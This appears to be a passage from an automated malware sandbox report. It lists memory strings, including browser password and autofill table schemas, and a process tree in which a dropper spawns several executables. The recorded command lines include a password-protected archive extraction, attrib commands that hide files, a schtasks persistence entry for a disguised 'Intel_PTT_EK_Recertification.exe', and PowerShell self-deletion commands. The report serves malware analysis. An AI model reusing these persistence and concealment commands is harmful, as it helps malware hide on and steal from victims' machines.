                        Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: b1dc05533c.exe, 00000014.00000003.269556756517.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269556560799.0000000003BC3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                        Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: b1dc05533c.exe, 00000014.00000003.269558440471.00000000039F3000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558119393.0000000003BC6000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269557715652.0000000003BC6000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558011592.00000000039F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: b1dc05533c.exe, 00000014.00000003.269570364935.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570020702.00000000039EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                        Source: file.exeReversingLabs: Detection: 47%
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe "C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe "C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeProcess created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                        Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                        Source: unknownProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeProcess created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe "C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe "C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe "C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe "C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeProcess created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeProcess created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
